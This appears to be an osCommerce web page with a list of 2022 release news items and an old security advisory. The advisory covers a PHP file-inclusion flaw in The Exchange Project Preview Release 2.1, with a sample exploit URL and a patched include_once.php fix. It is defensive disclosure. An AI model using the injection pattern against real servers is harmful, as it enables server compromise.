osCommerce News
Recent posts
post item
osCommerce 4.05 release
September 21, 2022
osCommerce 4.05 has been released! Read more to find out how to upgrade to the latest version and what has changed ...
post item
Hybrid Ecommerce
August 16, 2022
osCommerce brings a new type of Ecommerce platform to the market - a so called Hybrid Ecommerce. So what is Hybrid Ecommerce? We see it to be the best of both worlds - an open source (and free) Ecommerce solution that is also hosted as if it was SaaS (or EaaS - Ecommerce as a Service). This means users (businesses and developers) do not need to worry about hosting requirements and at the same time have full access to the source code and can change or implement any custom features, integrations, etc. Of course, it is always possible to host osCommerce on your own server! It is just so much easier (and quite likely more cost effective!) to use osCommerce's own hosting solutions.  Hybrid Ecommerce from osCommerce Users can choose to have osCommerce installed for free on one of our servers to try osCommerce before use.  Once satisfied with its features, speed, robustness - they can choose to move to a paid osCommerce hosting account or to download and use osCommerce site on their own server. Move to an osCommerce-managed server is done automatically. Server environment is optimised for osCommerce, allowing it to give the best performance. It is also managed and upgraded with the latest server software. Most importantly, osCommerce installation can be automatically updated to the latest version of osCommerce (and Applications) as well. Any customisations, done right, will stay but all the standard modules and the core of osCommerce will be regularly updated, bringing fixes, changes, new features. Full FTP and mySQL access are offered to businesses and developers should they require such.   ...
post item
osCommerce 4.03 release
August 16, 2022
osCommerce 4.03 has been released. Read more about what's new in the latest version of popular open source free shopping cart! ...
post item
osCommerce 4.02 release
August 09, 2022
osCommerce 4.02 release, update notes, download instructions ...
post item
osCommerce 4.01 release
August 04, 2022
osCommerce 4.01 is available from https://www.oscommerce.com   Changes are available from osCommerce Wiki:  https://wiki.oscommerce.com/index.php?title=Change_Log We will continue working on fixing issues and adding features, osCommerce will be regularly developed and updated. ...
post item
osCommerce 4.0 Interview
August 03, 2022
What is osCommerce 4.0? How it was created and why? What is the team behind osCommerce? How was osCommerce released during the war in Ukraine?  All of this and more in the video interview, done by David Goodale of Merchant Accounts (Canada):     Visit Merchant Accounts Canada  for the full video and transcript ...
post item
osCommerce proudly developed in the UK and Ukraine
July 27, 2022
As many readers would know, osCommerce is headquartered from the UK but the majority of our team members are in Ukraine. Same as it was for Magento btw, and for many other amazing technological solutions. What many readers perhaps do not realize is that osCommerce continues to be developed while the war is raging in Ukraine.  For example, the final touches to version 4 were made in the evening, while air raid sirens were wailing in many locations in Ukraine where our colleagues are located. We would like to once again express our appreciation and applaud the strong spirit of our colleagues who managed to complete their task (be it with a delay) and release osCommerce 4.0! Those men and women who continue to work hard on adding more features, enabling the App Shop, fixing those teething problems that users of osCommerce report to us. We are working hard to release more features and solutions, and will be updating you in due course! ...
post item
osCommerce v4 release
July 25, 2022
osCommerce 4 released today ...
post item
osCommerce Roadmap
July 25, 2022
Read more about osCommerce Roadmap ...
post item
osCommerce is dead... Long live osCommerce!
July 25, 2022
How osCommerce started, became extremely popular, went into decline and almost died... And was re-born and is being launched today on the way to success! ...
Products

Security Fix For The Exchange Project Preview Release 2.1

Overview
Example
Solution
Notes
Links

Overview

The Exchange Project Preview Release 2.1 [released March 2001] contains a security issue which can be taken advantage of by using the global variable scope that PHP provides.

The security issue concerns the following files:

catalog/includes/include_once.php
admin/includes/include_once.php

The cause of the security issue is the $include_file variable.

If either of the pages are requested directly through a client, the $include_file variable does not get initialized in the local variable scope; because of PHPs global variable scope PHP then automatically checks if $include_file has been set in the GET/POST/COOKIE variable scope.

Example

An example of how the security issue can be exploited via the GET variable scope is shown here:

https://server/catalog/includes/include_once.php?include_file=application_top.php

$include_file is now initialized through the GET variable scope making include_once.php perform the following action:

include('application_top.php');

The file 'application_top.php' is included and the results are shown to the client.

'application_top.php' is a light example of exploiting the security issue. The parameter value can be replaced to allow heavier exploitations which could compromise the server.

Solution

This security issue was fixed in the CVS repository (which contains the development sources to the next project version) one week after Preview Release 2.1 was released, which includes adding a .htaccess file to the following directories:

catalog/includes/
admin/includes/

The latest version of the .htaccess file can be downloaded from the CVS repository:

https://cvs.sf.net/cgi-bin/viewcvs.cgi/tep/catalog/catalog/includes/.htaccess

The .htaccess file, which works only with Apache web servers [that are configured to follow .htaccess files], is set to block direct requests to the 'includes' directory.

For other web servers, and for extra security, the include_once.php file should be replaced with the following:

<?php
  if (strstr($include_file, '..'))
    $include_file = str_replace('..', '', $include_file);

  if (strstr($include_file, '@'))
    $include_file = str_replace('@', '', $include_file);

  if (strstr($include_file, ':'))
    $include_file = str_replace(':', '', $include_file);

  if (isset($include_file) &&
      defined('DIR_WS_INCLUDES') &&
     !defined($include_file . '__') &&
      file_exists($include_file) &&
     !isset($HTTP_GET_VARS['include_file']) &&
     !isset($HTTP_POST_VARS['include_file']) &&
     !isset($HTTP_COOKIE_VARS['include_file']) &&
     !isset($HTTP_SESSION_VARS['include_file']) &&
     !isset($HTTP_POST_FILES['include_file']) &&
     !isset($HTTP_ENV_VARS['include_file'])) {

    define($include_file . '__', 1);
    include($include_file);
  }
?>


Notes

This security issue does not affect versions after Preview Release 2.1; the current development version is osCommerce 2.2-CVS which removes the include_once.php file from usage. The next stable release, osCommerce 2.2, will be the first [non preview-release] stable release the project has made, which focuses on security, stability, compatibility, and performance issues.

Links

This security issue was forwarded to the Bugtraq security mailing list which can be read at:

https://msgs.securepoint.com/cgi-bin/get/bugtraq0206/141.html

A study of common PHP exploitations can be read at:

/

The osCommerce support site is located at:

https://www.oscommerce.com